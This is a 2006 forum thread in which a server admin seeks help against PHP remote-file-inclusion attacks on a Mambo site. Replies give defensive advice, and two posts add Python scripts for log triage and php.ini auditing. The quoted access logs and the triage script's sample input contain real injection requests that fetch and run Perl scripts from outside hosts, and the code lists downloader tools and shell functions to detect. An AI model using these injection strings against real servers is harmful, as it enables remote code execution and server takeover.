php script injections

Discussion in 'General' started by Grizzly, Jul 16, 2006.

  1. Grizzly

    Grizzly New Member

    My server is being attacked by script injections. I have already chmod'ed wget, but the attacks still continue and seem to be getting more advanced. I need help securing the server.

    extract from logfile /var/log/apache2/access_log

    82.77.174.39 - - [16/Jul/2006:00:33:30 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.90.88.178/tool.gif?&cmd=cd%20/tmp/;wget%20http://66.90.88.178/mambo.txt;perl%20mambo.txt;rm%20-rf%20mambo.*? HTTP/1.0" 404 1181 "-" "Mozilla/5.0"

    extract from logfile /var/log/apache2/error_log

    [Sat Jul 15 22:20:45 2006] [error] an unknown filter was not added: PHP
    [Sat Jul 15 22:20:45 2006] [error] an unknown filter was not added: PHP
    --22:20:55-- http://66.90.88.178/mambo.txt
    => `mambo.txt'
    Connecting to 66.90.88.178:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 16,282 (16K) [text/plain]

    0K .......... ..... 100% 7.77 KB/s

    22:20:58 (7.77 KB/s) - `mambo.txt' saved [16282/16282]

    kill: usage: kill [-s sigspec | -n signum | -sigspec] [pid | job]... or kill -l [sigspec]
    [Sat Jul 15 22:41:53 2006] [warn] child process 13552 still did not exit, sending a SIGTERM
    [Sat Jul 15 22:41:53 2006] [warn] child process 30607 still did not exit, sending a SIGTERM


    Need help, advice, anything...

    Thank you in advance
     
  2. sjau

    sjau Local Meanie Moderator

    You could deny the IP of the attacker in a .htaccess file.
     
  3. TheRudy

    TheRudy ISPConfig Developer ISPConfig Developer

    Remove the script ASAP. Contact the author of the script and tell them about this if you haven't written it yourself. You might also check for updates. Denying the IP won't solve it, because he can use a different server and voila, you get hacked again.

    I would lock down the server until it's checked out. Run chkrootkit and rkhunter (not sure if they detect this script, but it can't hurt running them). An antivirus scan can't hurt either.

    Btw, Mambo is a VERY buggy application. I would suggest you switch to Joomla if you want the same interface and stuff. I think you can even upgrade from Mambo to Joomla.
     
  4. edge

    edge Active Member Moderator

  5. TheRudy

    TheRudy ISPConfig Developer ISPConfig Developer

    You also checked that eh? :D
     
  6. Grizzly

    Grizzly New Member

    Cant find the scripts on my site

    I can't seem to find the script on my server. I've installed rkhunter, updated it and scanned the system; it found nothing.

    66.90.88.178 is not my site; it's just that my server is being told to get these scripts from various sites, including the one mentioned, and then run them. When I check my running processes I find a lot of https instances which don't make any sense to me. I've tried looking for help on installing mod_security on my SuSE 10 server, but had no luck. I'm not too sure if it's safe to install when running ISPConfig with SuSE 10 using the perfect setup from HowtoForge.

    I have also updated to the latest patches from SuSE. These scripts are also being run on domains that I have since made dormant, with nothing in the actual /var/www/web#/web folder; when I check my logs, even they are being used to download these scripts, which is strange since before ISPConfig was installed I chmod 700 wget.
     
  7. TheRudy

    TheRudy ISPConfig Developer ISPConfig Developer

    The script looks like a war bot or whatever they are called. They are using a known exploit of the script (you are running the Mambo script, right?); they google it and then try to inject this script.

    Check the running processes (ps) and network connections (netstat) to see if you are connected to IRC
    host: 66.90.88.178
    port: 7474

    If you are, kill it! And block that port and IP with the firewall.

    Once you fix this, go to that IRC channel and say to them: I just PWNED YOU! :D
     
  8. Grizzly

    Grizzly New Member

    Output of netstat:

    Active UNIX domain sockets (w/o servers)
    Proto RefCnt Flags Type State I-Node Path
    unix 14 [ ] DGRAM 9984 /dev/log
    unix 2 [ ] DGRAM 9986 /var/lib/named/dev/log
    unix 2 [ ] DGRAM 4385 @/org/kernel/udev/udevd
    unix 2 [ ] DGRAM 12216 @/var/run/hal/hotplug_socket2
    unix 2 [ ] DGRAM 28905
    unix 2 [ ] DGRAM 17548
    unix 2 [ ] DGRAM 16934
    unix 3 [ ] STREAM CONNECTED 16687
    unix 3 [ ] STREAM CONNECTED 16686
    unix 3 [ ] STREAM CONNECTED 16683
    unix 3 [ ] STREAM CONNECTED 16682
    unix 3 [ ] STREAM CONNECTED 16679
    unix 3 [ ] STREAM CONNECTED 16678
    unix 3 [ ] STREAM CONNECTED 16675
    unix 3 [ ] STREAM CONNECTED 16674
    unix 3 [ ] STREAM CONNECTED 16671
    unix 3 [ ] STREAM CONNECTED 16670
    unix 3 [ ] STREAM CONNECTED 16667
    unix 3 [ ] STREAM CONNECTED 16666
    unix 3 [ ] STREAM CONNECTED 16663
    unix 3 [ ] STREAM CONNECTED 16662
    unix 3 [ ] STREAM CONNECTED 16659
    unix 3 [ ] STREAM CONNECTED 16658
    unix 3 [ ] STREAM CONNECTED 16655
    unix 3 [ ] STREAM CONNECTED 16654
    unix 3 [ ] STREAM CONNECTED 16651
    unix 3 [ ] STREAM CONNECTED 16650
    unix 3 [ ] STREAM CONNECTED 16647
    unix 3 [ ] STREAM CONNECTED 16646
    unix 3 [ ] STREAM CONNECTED 16643
    unix 3 [ ] STREAM CONNECTED 16642
    unix 3 [ ] STREAM CONNECTED 16639
    unix 3 [ ] STREAM CONNECTED 16638
    unix 3 [ ] STREAM CONNECTED 16635
    unix 3 [ ] STREAM CONNECTED 16634
    unix 3 [ ] STREAM CONNECTED 16631
    unix 3 [ ] STREAM CONNECTED 16630
    unix 3 [ ] STREAM CONNECTED 16627
    unix 3 [ ] STREAM CONNECTED 16626
    unix 3 [ ] STREAM CONNECTED 16623
    unix 3 [ ] STREAM CONNECTED 16622
    unix 3 [ ] STREAM CONNECTED 16619
    unix 3 [ ] STREAM CONNECTED 16618
    unix 3 [ ] STREAM CONNECTED 16615
    unix 3 [ ] STREAM CONNECTED 16614
    unix 3 [ ] STREAM CONNECTED 16611
    unix 3 [ ] STREAM CONNECTED 16610
    unix 3 [ ] STREAM CONNECTED 16607
    unix 3 [ ] STREAM CONNECTED 16606
    unix 3 [ ] STREAM CONNECTED 16603
    unix 3 [ ] STREAM CONNECTED 16602
    unix 3 [ ] STREAM CONNECTED 16599
    unix 3 [ ] STREAM CONNECTED 16598
    unix 3 [ ] STREAM CONNECTED 16595
    unix 3 [ ] STREAM CONNECTED 16594
    unix 3 [ ] STREAM CONNECTED 16591
    unix 3 [ ] STREAM CONNECTED 16590
    unix 3 [ ] STREAM CONNECTED 16588
    unix 3 [ ] STREAM CONNECTED 16587
    unix 3 [ ] STREAM CONNECTED 16584
    unix 3 [ ] STREAM CONNECTED 16583
    unix 3 [ ] STREAM CONNECTED 16581
    unix 3 [ ] STREAM CONNECTED 16580
    unix 2 [ ] DGRAM 16565
    unix 2 [ ] DGRAM 13315
    unix 3 [ ] STREAM CONNECTED 13230 /var/run/dbus/system_bus_socket
    unix 3 [ ] STREAM CONNECTED 13229
    unix 3 [ ] STREAM CONNECTED 13019 @/tmp/hald-local/dbus-qemgvsK3Jl
    unix 3 [ ] STREAM CONNECTED 13018
    unix 3 [ ] STREAM CONNECTED 12908 /var/run/dbus/system_bus_socket
    unix 3 [ ] STREAM CONNECTED 12907
    unix 3 [ ] STREAM CONNECTED 12906 /var/run/acpid.socket
    unix 3 [ ] STREAM CONNECTED 12905
    unix 2 [ ] DGRAM 12902
    unix 3 [ ] STREAM CONNECTED 12505 /var/run/acpid.socket
    unix 3 [ ] STREAM CONNECTED 12504
    unix 3 [ ] STREAM CONNECTED 12570 @/tmp/hald-local/dbus-qemgvsK3Jl
    unix 3 [ ] STREAM CONNECTED 12503
    unix 2 [ ] DGRAM 12142
    unix 2 [ ] DGRAM 10931
    unix 2 [ ] DGRAM 10743
    unix 2 [ ] DGRAM 10537
    unix 2 [ ] DGRAM 10363
    unix 2 [ ] DGRAM 9994
    unix 2 [ ] STREAM CONNECTED 9811
    unix 3 [ ] STREAM CONNECTED 4968
    unix 3 [ ] STREAM CONNECTED 4967
     
  9. TheRudy

    TheRudy ISPConfig Developer ISPConfig Developer

    Do a netstat -tap
    sorry :)
     
  10. Grizzly

    Grizzly New Member

    netstat -tap reveals the following:

    Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
    tcp 0 0 *:mysql *:* LISTEN 3045/mysqld
    tcp 0 0 localhost:compaq-evm *:* LISTEN 4683/fam
    tcp 0 0 *:sunrpc *:* LISTEN 4306/portmap
    tcp 0 0 *:hosts2-ns *:* LISTEN 4093/ispconfig_http
    tcp 0 0 *:ftp *:* LISTEN 5350/proftpd: (acce
    tcp 0 0 192.168.0.200:domain *:* LISTEN 5276/named
    tcp 0 0 server.mydomain:domain *:* LISTEN 5276/named
    tcp 0 0 localhost:domain *:* LISTEN 5276/named
    tcp 0 0 localhost:953 *:* LISTEN 5276/named
    tcp 0 0 *:smtp *:* LISTEN 5138/master
    tcp 0 0 *:pop3 *:* LISTEN 4531/couriertcpd
    tcp 0 0 *:imap *:* LISTEN 4501/couriertcpd
    tcp 0 0 *:www-http *:* LISTEN 5005/httpd2-prefork
    tcp 0 0 *:ssh *:* LISTEN 4905/sshd
    tcp 0 0 localhost:953 *:* LISTEN 5276/named
    tcp 0 0 *:smtp *:* LISTEN 5138/master
    tcp 0 0 *:https *:* LISTEN 5005/httpd2-prefork
     
  11. Grizzly

    Grizzly New Member

    This is after I blocked what you said before on the firewall and restarted the server. I have also blocked the IPs in .htaccess.
     
  12. Ben

    Ben ISPConfig Developer ISPConfig Developer

    For securing the server you could use mod_security for Apache.
    But be careful with that: a misconfigured mod_security causes e.g. phpMyAdmin to not work anymore, because it submits built queries via GET, which is disallowed in some howtos for mod_security.

    The next thing you can do is to disallow stuff like the url_fopen wrappers in php.ini, because normally the admin should know if scripts need to get something from anywhere on the internet.
     
  13. Grizzly

    Grizzly New Member

    Any idea where to find good posts on mod_security for SuSE 10?
     
  14. Ben

    Ben ISPConfig Developer ISPConfig Developer

    On what? Installation or configuration?

    That's an (undocumented) config example for mod_security.
    That can be placed anywhere in your Apache config... under Debian it makes sense to store that file in mods-available and link it into mods-enabled on usage. Under SuSE I actually (and I don't mind :D) don't know the hundreds of files the config is split into and where best to put that...

    Also you must load the module with something like
    To disable that stuff for e.g. phpMyAdmin
    If you're not willing to apply the rules from above to _ALL_ your sites and to whitelist stuff like phpMyAdmin, it makes sense to apply that filter only to some dirs....

    More on Installation and configuration can be found here: http://www.modsecurity.org/documentation/modsecurity-apache/1.9.3/html-multipage/
     
  15. falko

    falko Super Moderator ISPConfig Developer

  16. Grizzly

    Grizzly New Member

    Attacks continue

    I've now spent the last 48h reinstalling the entire server. I've done all of the above except for the mod_security bit, but when I check my logfiles I find the following. I've redone the websites; the Mambo sites are now blank Joomla (latest stable version) sites until I get time to redo them. The only .htaccess files I can find lie in the stats folders; is this correct?
    /var/log/httpd/ispconfig_access_log:

    www.mydomain.com||||167||||82.192.65.106 - - [17/Jul/2006:21:23:03 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/antos/tool25.dat?&cmd=cd%20/tmp/;lwp-download%20http://www.freewebtown.com/antos/a2.txt;perl%20a2.txt;rm%20-rf%20a2*? HTTP/1.0" 200 167 "-" "Mozilla/5.0"

    and in /var/log/apache2/access_log for the same time

    82.192.65.106 - - [17/Jul/2006:21:23:03 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/antos/tool25.dat?&cmd=cd%20/tmp/;lwp-download%20http://www.freewebtown.com/antos/a2.txt;perl%20a2.txt;rm%20-rf%20a2*? HTTP/1.0" 200 167 "-" "Mozilla/5.0"
    61.135.145.206 - - [17/Jul/2006:21:24:12 +0200] "GET / HTTP/1.1" 200 17330 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"

    and in /var/log/apache2/error_log at the same time

    [Mon Jul 17 21:23:03 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:23:03 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:24:12 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:24:12 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:30:21 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:30:21 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:30:31 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:30:31 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:30:32 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:30:32 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:30:43 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:30:43 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:30:44 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:30:44 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:30:46 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:30:46 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:30:47 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:30:47 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:30:48 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:30:48 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:30:49 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:30:49 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:30:52 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:30:52 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:30:53 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:30:53 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:30:58 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:30:58 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:31:02 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:31:02 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:31:06 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:31:06 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:31:07 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:31:07 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:31:12 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:31:12 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:31:15 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:31:15 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:34:46 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:34:46 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:35:06 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:35:06 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:43:37 2006] [error] an unknown filter was not added: PHP
    [Mon Jul 17 21:43:37 2006] [error] an unknown filter was not added: PHP

    Is this a failed attempt, or do I have reason to worry? I'm about to go out of my mind. Please help.
     
  17. TheRudy

    TheRudy ISPConfig Developer ISPConfig Developer

    The attacks continue because you are still using the same buggy script! I've told you already to remove it from public usage! That PHP error is nothing you have to be worried about. But please, disable this Mambo site and the attacks will stop. Blocking one IP is kinda useless since they just change sites.

    Again, REMOVE THE WEBSITE or update the website with a newer patch or something. What version of Mambo CMS are you using?
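
    The access_log lines quoted in posts 1 and 16 can be triaged mechanically. The Python below is an added example for this thread, not code posted by anyone here: it parses Apache combined-format lines, decodes the query string by hand, flags any parameter whose value is a remote URL (mosConfig_absolute_path in Mambo's case), pulls the shell command out of cmd=, and lists the downloader each stage uses and the second-stage URLs, so you can see which tool the bot falls back to once wget is locked down and which hosts an outbound firewall rule should cover. The three sample lines are the ones from the thread, embedded as constructed input. The wording in verdict() is the rule of thumb from this thread: a 404 means the request never reached a script, a 200 means one ran and the box needs checking; neither proves compromise by itself.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional
from urllib.parse import unquote, urlsplit

# Constructed sample input: the request lines quoted in this thread (the
# 16 Jul wget attempt that got a 404, the 17 Jul lwp-download attempt that
# got a 200, and the Baiduspider hit), in Apache combined log format.
SAMPLE_LOG = r'''82.77.174.39 - - [16/Jul/2006:00:33:30 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.90.88.178/tool.gif?&cmd=cd%20/tmp/;wget%20http://66.90.88.178/mambo.txt;perl%20mambo.txt;rm%20-rf%20mambo.*? HTTP/1.0" 404 1181 "-" "Mozilla/5.0"
82.192.65.106 - - [17/Jul/2006:21:23:03 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/antos/tool25.dat?&cmd=cd%20/tmp/;lwp-download%20http://www.freewebtown.com/antos/a2.txt;perl%20a2.txt;rm%20-rf%20a2*? HTTP/1.0" 200 167 "-" "Mozilla/5.0"
61.135.145.206 - - [17/Jul/2006:21:24:12 +0200] "GET / HTTP/1.1" 200 17330 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"'''

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.I)
URL_IN_CMD = re.compile(r'(?:https?|ftp)://[^\s;|&]+', re.I)
# Fetchers a dropper typically tries; locking down wget just moves it to the next.
DOWNLOADERS = {'wget', 'curl', 'lwp-download', 'lwp-request', 'fetch', 'lynx', 'links'}


@dataclass
class Finding:
    ip: str
    timestamp: str
    status: int
    include_param: str      # parameter that carried the remote URL
    include_url: str        # first stage: file the vulnerable include() pulls in
    cmd: str                # decoded command the first stage is told to run
    downloaders: List[str]  # wget / lwp-download / ... seen in cmd
    stage2_urls: List[str]  # files cmd fetches into /tmp


def parse_query(target: str) -> Dict[str, str]:
    """Decode a request target's query string into key/value pairs.

    Done by hand rather than with urllib.parse.parse_qsl because older
    Pythons also split on ';', which would chop the injected command apart.
    """
    if '?' not in target:
        return {}
    params: Dict[str, str] = {}
    for pair in target.split('?', 1)[1].split('&'):
        if pair:
            key, _, value = pair.partition('=')
            params[unquote(key)] = unquote(value)
    return params


def triage_line(line: str) -> Optional[Finding]:
    """Return a Finding for a remote-file-inclusion attempt, else None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    params = parse_query(m.group('target'))
    # Any parameter whose value is a full URL is a candidate include path.
    remote = [(k, v) for k, v in params.items() if REMOTE_URL.match(v)]
    if not remote:
        return None
    include_param, include_url = remote[0]   # trailing '?' is the attacker's, kept as-is
    cmd = params.get('cmd', '')
    words = [part.split() for part in cmd.split(';')]
    downloaders = [w[0] for w in words if w and w[0] in DOWNLOADERS]
    return Finding(ip=m.group('ip'), timestamp=m.group('ts'),
                   status=int(m.group('status')), include_param=include_param,
                   include_url=include_url, cmd=cmd, downloaders=downloaders,
                   stage2_urls=URL_IN_CMD.findall(cmd))


def triage_log(text: str) -> List[Finding]:
    return [f for f in (triage_line(l) for l in text.splitlines()) if f]


def verdict(f: Finding) -> str:
    """What the HTTP status tells you, and what it does not."""
    if f.status == 404:
        return 'attempt only: the requested path did not exist, so no script ran'
    if f.status == 200:
        return ('a script ran: check /tmp, ps and netstat for the dropper; '
                'a 200 alone does not prove the remote include succeeded')
    return f'status {f.status}: inspect manually'


def hosts_to_block(findings: List[Finding]) -> List[str]:
    """Hosts the attack pulls code from: candidates for an outbound deny rule."""
    hosts = set()
    for f in findings:
        for url in [f.include_url, *f.stage2_urls]:
            host = urlsplit(url).hostname
            if host:
                hosts.add(host)
    return sorted(hosts)


if __name__ == '__main__':
    found = triage_log(SAMPLE_LOG)
    for f in found:
        print(f.ip, f.status, f.include_param, '->', f.include_url)
        print('  cmd:', f.cmd)
        print('  downloaders:', f.downloaders, ' stage 2:', f.stage2_urls)
        print('  ', verdict(f))
    print('block outbound to:', hosts_to_block(found))
```

    Run it over the real log with `triage_log(open('/var/log/apache2/access_log').read())`; the interesting output is the second line of the thread, where the bot has already swapped wget for lwp-download, which is why an outbound firewall rule on the hosts in hosts_to_block() holds up better than chmod on one binary.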
     
  18. todvard

    todvard ISPConfig Developer ISPConfig Developer

    Just one thing to mention: it is good practice to enable and configure the firewall for outbound connections as well. If you had a good firewall script which allows http access only to trusted sites, then you wouldn't have to worry about those attacks.
     
  19. edge

    edge Active Member Moderator

  20. Ben

    Ben ISPConfig Developer ISPConfig Developer

    And don't forget to allow only some system users for some connections....


    The next thing is to disable "allow_url_fopen" in php.ini to prevent any script from reading stuff from anywhere on the internet!
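
    Ben's advice in posts 12 and 20 comes down to a few php.ini lines, and it is easy to get the value syntax wrong. The Python below is an added example, not from this thread or from PHP's own tooling: it reads a php.ini with PHP's own rules for boolean values (On/Off, 1/0, yes/no, quoted values, ';' comments) and reports the settings that make the mosConfig_absolute_path injection in the logs above work. The two ini snippets are constructed. register_globals is checked as well because the variable overwrite depends on it, and disable_functions because the dropper's cmd= needs a PHP function that spawns a shell.

```python
from typing import Dict, List

# Constructed samples: the relevant lines of a stock 2006-era php.ini and the
# same lines after hardening, with two parsing traps (a quoted value and a
# trailing comment) thrown in.
STOCK_PHP_INI = '''
[PHP]
; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
allow_url_fopen = On
register_globals = "Off"   ; quoted, but still a boolean to PHP
disable_functions =
'''

HARDENED_PHP_INI = '''
[PHP]
allow_url_fopen = Off
register_globals = Off
disable_functions = exec,passthru,shell_exec,system,proc_open,popen
'''

# Functions a "cmd=" web shell uses to spawn a process.
SHELL_FUNCS = ('exec', 'passthru', 'shell_exec', 'system', 'proc_open', 'popen')


def parse_php_ini(text: str) -> Dict[str, str]:
    """Minimal php.ini reader: ';' comments, [sections] skipped, quotes stripped.

    Good enough for an audit; it does not handle ';' inside a quoted value.
    """
    settings: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.split(';', 1)[0].strip()
        if not line or line.startswith('['):
            continue
        key, sep, value = line.partition('=')
        if not sep:
            continue
        value = value.strip()
        if len(value) >= 2 and value[0] == value[-1] and value[0] in '"\'':
            value = value[1:-1]
        settings[key.strip().lower()] = value
    return settings


def php_bool(value: str) -> bool:
    """PHP's rule for boolean ini values: on/yes/true, otherwise a non-zero number."""
    v = value.strip().lower()
    if v in ('on', 'yes', 'true'):
        return True
    try:
        return int(v) != 0
    except ValueError:
        return False


def audit(settings: Dict[str, str]) -> List[str]:
    """Settings that let mosConfig_absolute_path=http://... include and run
    remote code. Fallbacks are PHP's defaults for keys the file omits."""
    findings: List[str] = []
    if php_bool(settings.get('allow_url_fopen', 'On')):
        findings.append('allow_url_fopen is On: include() and fopen() accept '
                        'http:// paths, which the injected include relies on')
    if php_bool(settings.get('allow_url_include', 'Off')):   # PHP 5.2 and later
        findings.append('allow_url_include is On: include()/require() accept URLs')
    if php_bool(settings.get('register_globals', 'Off')):
        findings.append('register_globals is On: request parameters become PHP '
                        'variables, which is how mosConfig_absolute_path gets overwritten')
    disabled = {f.strip() for f in settings.get('disable_functions', '').split(',')}
    exposed = [f for f in SHELL_FUNCS if f not in disabled]
    if exposed:
        findings.append('disable_functions leaves shell spawners available: '
                        + ', '.join(exposed))
    return findings


if __name__ == '__main__':
    for name, ini in (('stock', STOCK_PHP_INI), ('hardened', HARDENED_PHP_INI)):
        print(name + ':', audit(parse_php_ini(ini)) or ['ok'])
```

    Point it at the live file with `audit(parse_php_ini(open('/etc/php5/apache2/php.ini').read()))` (path varies by distribution) and restart Apache after changing anything; note that disable_functions cuts off the dropper's shell but not a PHP-only backdoor, so it complements rather than replaces removing the vulnerable Mambo install.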
     
